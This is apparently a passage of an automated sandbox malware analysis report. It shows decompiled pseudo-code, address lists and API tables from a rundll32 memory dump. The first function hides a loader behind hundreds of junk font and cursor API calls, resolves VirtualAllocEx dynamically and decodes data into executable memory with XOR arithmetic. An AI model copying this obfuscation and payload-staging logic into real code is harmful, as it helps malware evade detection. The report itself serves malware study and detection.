					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					_t236 = LoadCursorW(0, 0xe49);
					_t237 =  *0x2865d1c; // 0x28d7800
					_t240 = LoadCursorW(0, 0xe49);
					_t241 = LoadCursorW(0, 0xe49);
					_t242 = LoadCursorW(0, 0xe49);
					_t243 = LoadCursorW(0, 0xe49);
					_t244 = LoadCursorW(0, 0xe49);
					_t245 = LoadCursorW(0, 0xe49);
					_t246 = LoadCursorW(0, 0xe49);
					_t247 = LoadCursorW(0, 0xe49);
					_t248 = LoadCursorW(0, 0xe49);
					_t249 = LoadCursorW(0, 0xe49);
					_t250 = LoadCursorW(0, 0xe49);
					_t251 = LoadCursorW(0, 0xe49);
					_t252 = LoadCursorW(0, 0xe49);
					_t253 = LoadCursorW(0, 0xe49);
					_t254 = LoadCursorW(0, 0xe49);
					_t255 = LoadCursorW(0, 0xe49);
					_t256 = LoadCursorW(0, 0xe49);
					_t257 = LoadCursorW(0, 0xe49);
					_t258 = LoadCursorW(0, 0xe49);
					_t259 = LoadCursorW(0, 0xe49);
					_t260 = LoadCursorW(0, 0xe49);
					_t261 = LoadCursorW(0, 0xe49);
					_t262 = LoadCursorW(0, 0xe49);
					_t263 = LoadCursorW(0, 0xe49);
					_t264 = LoadCursorW(0, 0xe49);
					_t265 = LoadCursorW(0, 0xe49);
					_t266 = LoadCursorW(0, 0xe49);
					_t267 = LoadCursorW(0, 0xe49);
					_t268 = LoadCursorW(0, 0xe49);
					_t269 = LoadCursorW(0, 0xe49);
					_t270 = LoadCursorW(0, 0xe49);
					_t271 =  *0x2865d1c; // 0x28d7800
					 *_t271 = _t236 + ( *_t237 ^ _v40 + _v84 + _v72) + _t240 + _t241 + _t242 + _t243 + _t244 + _t245 + _t246 + _t247 + _t248 + _t249 + _t250 + _t251 + _t252 + _t253 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t260 + _t261 + _t262 + _t263 + _t264 + _t265 + _t266 + _t267 + _t268 + _t269 + _t270;
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					AddFontResourceA(0x2861ffc);
					_v72 = _v72 + 4;
					 *0x2865d1c =  &(( *0x2865d1c)[1]);
				}
				_v36 = 0x1000;
				_t121 =  *0x2865d18; // 0x28cfffc
				_t124 = _t121 + _v32 - _v36 + 4;
				_v24 = _t124;
				_push(_v8);
				_push(_v12);
				_push(_v20);
				_push(_v16);
				_push( *0x2865668);
				_push(1);
				_push(_v24);
				return _t124;
			}


















































































                          0x02861585
                          0x02861587
                          0x0286158b
                          0x0286158e
                          0x02861595
                          0x0286159c
                          0x028615a3
                          0x028615aa
                          0x028615b1
                          0x028615b8
                          0x028615bf
                          0x028615c6
                          0x028615cf
                          0x028615dc
                          0x028615e9
                          0x028615ee
                          0x028615f3
                          0x028615fa
                          0x028615ff
                          0x02861609
                          0x0286160e
                          0x02861611
                          0x02861617
                          0x0286161a
                          0x02861621
                          0x02861624
                          0x02861631
                          0x02861637
                          0x0286163a
                          0x02861643
                          0x0286164e
                          0x02861653
                          0x0286165c
                          0x02861661
                          0x02861666
                          0x0286166d
                          0x02861670
                          0x02861678
                          0x0286167d
                          0x02861684
                          0x02861690
                          0x0286169a
                          0x028616a4
                          0x028616ae
                          0x028616b8
                          0x028616c2
                          0x028616cc
                          0x028616d6
                          0x028616e0
                          0x028616ea
                          0x028616f4
                          0x028616fe
                          0x02861718
                          0x02861737
                          0x0286173d
                          0x0286174a
                          0x0286174f
                          0x02861754
                          0x02861759
                          0x02861761
                          0x02861768
                          0x0286176d
                          0x02861770
                          0x02861781
                          0x0286178b
                          0x02861795
                          0x0286179f
                          0x028617a9
                          0x028617b3
                          0x028617bd
                          0x028617c7
                          0x028617d1
                          0x028617db
                          0x028617e5
                          0x028617ef
                          0x028617f4
                          0x028617fd
                          0x02861808
                          0x02861810
                          0x02861816
                          0x0286181c
                          0x0286181c
                          0x02861824
                          0x0286182d
                          0x02861836
                          0x02861843
                          0x0286184a
                          0x02861858
                          0x02861861
                          0x02861868
                          0x0286186d
                          0x02861874
                          0x0286187e
                          0x02861888
                          0x02861892
                          0x0286189c
                          0x028618a6
                          0x028618b0
                          0x028618ba
                          0x028618c4
                          0x028618ce
                          0x028618d8
                          0x028618e2
                          0x028618ec
                          0x028618f6
                          0x02861900
                          0x0286190a
                          0x02861914
                          0x0286191e
                          0x02861928
                          0x02861932
                          0x0286193c
                          0x02861946
                          0x02861950
                          0x0286195a
                          0x02861964
                          0x0286196e
                          0x02861978
                          0x02861982
                          0x0286198c
                          0x02861996
                          0x028619a0
                          0x028619aa
                          0x028619b4
                          0x028619be
                          0x028619c8
                          0x028619d2
                          0x028619dc
                          0x028619e6
                          0x028619f0
                          0x028619fa
                          0x02861a04
                          0x02861a0e
                          0x02861a18
                          0x02861a22
                          0x02861a2c
                          0x02861a36
                          0x02861a40
                          0x02861a4a
                          0x02861a54
                          0x02861a5e
                          0x02861a68
                          0x02861a72
                          0x02861a7c
                          0x02861a86
                          0x02861a90
                          0x02861a9a
                          0x02861aa4
                          0x02861aae
                          0x02861ab8
                          0x02861ac2
                          0x02861acc
                          0x02861ad6
                          0x02861ae0
                          0x02861aea
                          0x02861af4
                          0x02861afe
                          0x02861b08
                          0x02861b12
                          0x02861b1c
                          0x02861b26
                          0x02861b30
                          0x02861b3a
                          0x02861b44
                          0x02861b4e
                          0x02861b58
                          0x02861b62
                          0x02861b6c
                          0x02861b76
                          0x02861b80
                          0x02861b8a
                          0x02861b94
                          0x02861b9e
                          0x02861ba8
                          0x02861bb2
                          0x02861bbc
                          0x02861bc6
                          0x02861bd0
                          0x02861bda
                          0x02861be4
                          0x02861bee
                          0x02861bf8
                          0x02861c02
                          0x02861c0c
                          0x02861c16
                          0x02861c20
                          0x02861c2a
                          0x02861c34
                          0x02861c3e
                          0x02861c48
                          0x02861c52
                          0x02861c5c
                          0x02861c66
                          0x02861c70
                          0x02861c7a
                          0x02861c86
                          0x02861c8d
                          0x02861ca8
                          0x02861cb6
                          0x02861cc4
                          0x02861cd2
                          0x02861ce0
                          0x02861cee
                          0x02861cfc
                          0x02861d0a
                          0x02861d18
                          0x02861d26
                          0x02861d34
                          0x02861d42
                          0x02861d50
                          0x02861d5e
                          0x02861d6c
                          0x02861d7a
                          0x02861d88
                          0x02861d96
                          0x02861da4
                          0x02861db2
                          0x02861dc0
                          0x02861dce
                          0x02861ddc
                          0x02861dea
                          0x02861df8
                          0x02861e06
                          0x02861e14
                          0x02861e22
                          0x02861e30
                          0x02861e3e
                          0x02861e4c
                          0x02861e53
                          0x02861e58
                          0x02861e5f
                          0x02861e69
                          0x02861e73
                          0x02861e7d
                          0x02861e87
                          0x02861e91
                          0x02861e9b
                          0x02861ea5
                          0x02861eaf
                          0x02861eb9
                          0x02861ec3
                          0x02861ecd
                          0x02861ed7
                          0x02861ee1
                          0x02861eeb
                          0x02861ef5
                          0x02861eff
                          0x02861f09
                          0x02861f13
                          0x02861f1d
                          0x02861f27
                          0x02861f31
                          0x02861f3b
                          0x02861f45
                          0x02861f4f
                          0x02861f59
                          0x02861f63
                          0x02861f6d
                          0x02861f77
                          0x02861f81
                          0x02861f8b
                          0x02861f95
                          0x02861f9f
                          0x02861fa4
                          0x02861fa8
                          0x02861fb2
                          0x02861fbb
                          0x02861fc2
                          0x02861fcd
                          0x02861fd0
                          0x02861fd3
                          0x02861fd6
                          0x02861fd9
                          0x02861fdc
                          0x02861fdf
                          0x02861fe5
                          0x02861fe7
                          0x02861fea

                          APIs
                          • GetEnhMetaFileW.GDI32(02861FFC,00001205,gyy), ref: 028615FF
                          • GetEnhMetaFileW.GDI32(02861FFC,02861FFC,00001205,gyy), ref: 02861609
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861690
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286169A
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616A4
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616AE
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616B8
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616C2
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616CC
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616D6
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616E0
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616EA
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616F4
                          • AddFontResourceA.GDI32(02861FFC), ref: 028616FE
                          • LoadLibraryA.KERNEL32(kernel32,VirtualAllocEx,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC), ref: 0286170D
                          • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02861713
                          • VirtualAllocEx.KERNEL32(000000FF,00000000,?,00001000,00000040,VirtualAllocEx,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC,02861FFC), ref: 02861737
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861781
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286178B
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861795
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286179F
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617A9
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617B3
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617BD
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617C7
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617D1
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617DB
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617E5
                          • AddFontResourceA.GDI32(02861FFC), ref: 028617EF
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861843
                          • DeleteObject.GDI32(00000000), ref: 02861858
                          • DeleteObject.GDI32(00000000), ref: 02861861
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861874
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286187E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861888
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861892
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286189C
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618A6
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618B0
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618BA
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618C4
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618CE
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618D8
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618E2
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618EC
                          • AddFontResourceA.GDI32(02861FFC), ref: 028618F6
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861900
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286190A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861914
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286191E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861928
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861932
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286193C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861946
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861950
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286195A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861964
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286196E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861978
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861982
                          • AddFontResourceA.GDI32(02861FFC), ref: 0286198C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861996
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619A0
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619AA
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619B4
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619BE
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619C8
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619D2
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619DC
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619E6
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619F0
                          • AddFontResourceA.GDI32(02861FFC), ref: 028619FA
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A04
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A0E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A18
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A22
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A2C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A36
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A40
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A4A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A54
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A5E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A68
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A72
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A7C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A86
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A90
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861A9A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AA4
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AAE
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AB8
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AC2
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861ACC
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AD6
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AE0
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AEA
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AF4
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861AFE
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B08
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B12
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B1C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B26
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B30
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B3A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B44
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B4E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B58
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B62
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B6C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B76
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B80
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B8A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B94
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861B9E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BA8
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BB2
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BBC
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BC6
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BD0
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BDA
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BE4
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BEE
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861BF8
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C02
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C0C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C16
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C20
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C2A
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C34
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C3E
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C48
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C52
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C5C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C66
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C70
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861C7A
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861C86
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CA8
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CB6
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CC4
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CD2
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CE0
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CEE
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861CFC
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D0A
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D18
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D26
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D34
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D42
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D50
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D5E
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D6C
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D7A
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D88
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861D96
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DA4
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DB2
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DC0
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DCE
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DDC
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DEA
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861DF8
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861E06
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861E14
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861E22
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861E30
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861E3E
                          • LoadCursorW.USER32(00000000,00000E49), ref: 02861E4C
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E5F
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E69
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E73
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E7D
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E87
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E91
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861E9B
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EA5
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EAF
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EB9
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EC3
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861ECD
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861ED7
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EE1
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EEB
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EF5
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861EFF
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F09
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F13
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F1D
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F27
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F31
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F3B
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F45
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F4F
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F59
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F63
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F6D
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F77
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F81
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F8B
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F95
                          • AddFontResourceA.GDI32(02861FFC), ref: 02861F9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FontResource$Load$Cursor$DeleteFileMetaObject$AddressAllocLibraryProcVirtual
                          • String ID: VirtualAllocEx$gyy$kernel32${
                          • API String ID: 3736478088-3386851043
                          • Opcode ID: 1fe5a7350bf6ea65692cb9d1066232f7ba46fa4ffb252e14e7b39c824726c3b5
                          • Instruction ID: 9b2fd403c2cede7144c84ae09bbc6b668f80937c962c13fed41cd6a5a46a6075
                          • Opcode Fuzzy Hash: 1fe5a7350bf6ea65692cb9d1066232f7ba46fa4ffb252e14e7b39c824726c3b5
                          • Instruction Fuzzy Hash: E9123E6E6A03197EF642BBB5EC8EF6E7B7A5B0CB12F100810E649B5783DBD914404D62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D575C Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184registrystringlibraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 65%
                          			E027D575C(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x27d5861);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E027D55A4( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E027D59C8, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E027D5868);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L027D1354();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L027D135C();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L027D1354();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L027D1354();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L027D1354();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                          0x027d575d
                          0x027d575f
                          0x027d5767
                          0x027d5778
                          0x027d577d
                          0x027d5796
                          0x027d579d
                          0x027d57df
                          0x027d57e1
                          0x027d57e2
                          0x027d57e7
                          0x027d57ea
                          0x027d57ed
                          0x027d57ff
                          0x027d5822
                          0x027d5842
                          0x027d5842
                          0x027d5846
                          0x027d584c
                          0x027d584f
                          0x027d5852
                          0x027d5860
                          0x027d579f
                          0x027d57b4
                          0x027d57bb
                          0x00000000
                          0x027d57bd
                          0x027d57d2
                          0x027d57d9
                          0x027d5868
                          0x027d5870
                          0x027d5877
                          0x027d5878
                          0x027d588b
                          0x027d5890
                          0x027d5899
                          0x027d58af
                          0x027d58b5
                          0x027d58b6
                          0x027d58c3
                          0x027d58c8
                          0x027d58c7
                          0x027d58c7
                          0x027d58d7
                          0x027d58df
                          0x027d58e5
                          0x027d58ea
                          0x027d58f7
                          0x027d58fb
                          0x027d58fc
                          0x027d58fd
                          0x027d5912
                          0x027d5912
                          0x027d5916
                          0x027d592f
                          0x027d5933
                          0x027d5934
                          0x027d5935
                          0x027d5945
                          0x027d594a
                          0x027d594e
                          0x027d5950
                          0x027d5965
                          0x027d5969
                          0x027d596a
                          0x027d596b
                          0x027d597b
                          0x027d5980
                          0x027d5980
                          0x027d594e
                          0x027d5916
                          0x027d58df
                          0x027d5989
                          0x00000000
                          0x00000000
                          0x00000000
                          0x027d57d9
                          0x027d57bb

                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00001205,028630A4), ref: 027D5778
                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00001205,028630A4), ref: 027D5796
